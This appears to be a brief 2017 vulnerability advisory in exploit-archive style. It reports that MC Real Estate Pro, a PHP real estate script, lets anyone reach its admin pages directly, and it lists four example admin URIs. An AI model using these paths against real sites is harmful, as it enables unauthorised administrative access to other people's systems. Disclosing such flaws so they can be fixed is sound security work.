MC Real Estate Pro script suffers from an insecure direct object reference vulnerability.
7763eea160870f65f01ef2016815c8cb67c9a8a527249a267c0a5d2ba74acc3a
# # # # #
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Real Estate Pro
# Script Buy Now: http://microcode.ws/product/mc-real-estate-pro-php-script/3858
# Author: Adeghsan Aencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/AddPropertyType/apt
# http://localhost/[PATH]/admin/AddNewState/Add_State
# http://localhost/[PATH]/admin/AddNewCity/Add_City
# http://localhost/[PATH]/admin/SliderTable/st
# Vs.......
# # # # #